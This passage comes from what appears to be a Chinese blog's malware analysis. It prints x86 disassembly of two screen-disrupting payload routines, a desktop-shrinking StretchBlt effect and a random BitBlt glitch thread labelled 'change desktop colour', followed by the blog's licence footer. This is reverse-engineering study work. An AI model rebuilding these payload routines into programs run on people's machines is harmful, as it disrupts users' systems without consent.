asm.text:004017E9 push ebp .text:004017EA mov ebp, esp .text:004017EC sub esp, 18h .text:004017EF push esi .text:004017F0 push edi .text:004017F1 call ds:GetDesktopWindow .text:004017F7 mov edi, eax .text:004017F9 push edi ; hWnd .text:004017FA call ds:GetWindowDC .text:00401800 mov esi, eax .text:00401802 lea eax, [ebp+Rect] .text:00401805 push eax ; lpRect .text:00401806 push edi ; hWnd .text:00401807 call ds:GetWindowRect .text:0040180D mov eax, [ebp+Rect.bottom] .text:00401810 mov ecx, [ebp+Rect.right] .text:00401813 push 0CC0020h ; rop .text:00401818 push eax ; hSrc .text:00401819 push ecx ; wSrc .text:0040181A push 0 ; ySrc .text:0040181C push 0 ; xSrc .text:0040181E push esi ; hdcSrc .text:0040181F add eax, 0FFFFFF9Ch .text:00401822 push eax ; hDest .text:00401823 lea eax, [ecx-64h] .text:00401826 push eax ; wDest .text:00401827 push 32h ; '2' ; yDest .text:00401829 push 32h ; '2' ; xDest .text:0040182B push esi ; hdcDest .text:0040182C call ds:StretchBlt .text:00401832 push esi ; hDC .text:00401833 push edi ; hWnd .text:00401834 call ds:ReleaseDC .text:0040183A fild [ebp+arg_0] .text:0040183D fstp [ebp+var_8] .text:00401840 fld [ebp+var_8] .text:00401843 fdiv ds:dbl_403A48 .text:00401849 fadd ds:dbl_403A30 .text:0040184F fdivr ds:dbl_403A70 .text:00401855 fadd ds:dbl_403A40 .text:0040185B call sub_401B09 .text:00401860 pop edi .text:00401861 pop esi .text:00401862 mov esp, ebp .text:00401864 pop ebp .text:00401865 retn .text:00401865 sub_4017E9 endp
线程10:
修改桌面颜色
asm.text:004016CD push ebp .text:004016CE mov ebp, esp .text:004016D0 sub esp, 24h .text:004016D3 push ebx .text:004016D4 push esi .text:004016D5 push edi .text:004016D6 call ds:GetDesktopWindow .text:004016DC mov ebx, eax .text:004016DE push ebx ; hWnd .text:004016DF mov [ebp+hWnd], ebx .text:004016E2 call ds:GetWindowDC .text:004016E8 mov [ebp+hdc], eax .text:004016EB lea eax, [ebp+Rect] .text:004016EE push eax ; lpRect .text:004016EF push ebx ; hWnd .text:004016F0 call ds:GetWindowRect .text:004016F6 call sub_401A55 .text:004016FB mov ecx, [ebp+Rect.right] .text:004016FE add ecx, 0FFFFFF9Ch .text:00401701 cdq .text:00401702 idiv ecx .text:00401704 mov [ebp+x], edx .text:00401707 call sub_401A55 .text:0040170C mov ecx, [ebp+Rect.bottom] .text:0040170F add ecx, 0FFFFFF9Ch .text:00401712 cdq .text:00401713 idiv ecx .text:00401715 mov [ebp+y], edx .text:00401718 call sub_401A55 .text:0040171D mov ecx, [ebp+Rect.right] .text:00401720 add ecx, 0FFFFFF9Ch .text:00401723 cdq .text:00401724 idiv ecx .text:00401726 mov ebx, edx .text:00401728 call sub_401A55 .text:0040172D mov ecx, [ebp+Rect.bottom] .text:00401730 add ecx, 0FFFFFF9Ch .text:00401733 cdq .text:00401734 idiv ecx .text:00401736 mov edi, edx .text:00401738 call sub_401A55 .text:0040173D cdq .text:0040173E mov ecx, 258h .text:00401743 idiv ecx .text:00401745 mov esi, edx .text:00401747 call sub_401A55 .text:0040174C cdq .text:0040174D mov ecx, 258h .text:00401752 idiv ecx .text:00401754 push 0CC0020h ; rop .text:00401759 push edi ; y1 .text:0040175A push ebx ; x1 .text:0040175B mov ebx, [ebp+hdc] .text:0040175E push ebx ; hdcSrc .text:0040175F push edx ; cy .text:00401760 push esi ; cx .text:00401761 push [ebp+y] ; y .text:00401764 push [ebp+x] ; x .text:00401767 push ebx ; hdc .text:00401768 call ds:BitBlt .text:0040176E push ebx ; hDC .text:0040176F push [ebp+hWnd] ; hWnd .text:00401772 call ds:ReleaseDC .text:00401778 fild [ebp+arg_0] .text:0040177B fstp qword ptr [ebp-14h] .text:0040177E fld qword ptr [ebp-14h] .text:00401781 fdiv ds:dbl_403A48 .text:00401787 fadd ds:dbl_403A30 .text:0040178D fdivr ds:dbl_403A70 .text:00401793 fadd ds:dbl_403A38 .text:00401799 call sub_401B09 .text:0040179E pop edi .text:0040179F pop esi .text:004017A0 pop ebx .text:004017A1 mov esp, ebp .text:004017A3 pop ebp .text:004017A4 retn .text:004017A4 sub_4016CD endp
本文作者:Na1r
本文链接:
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
目录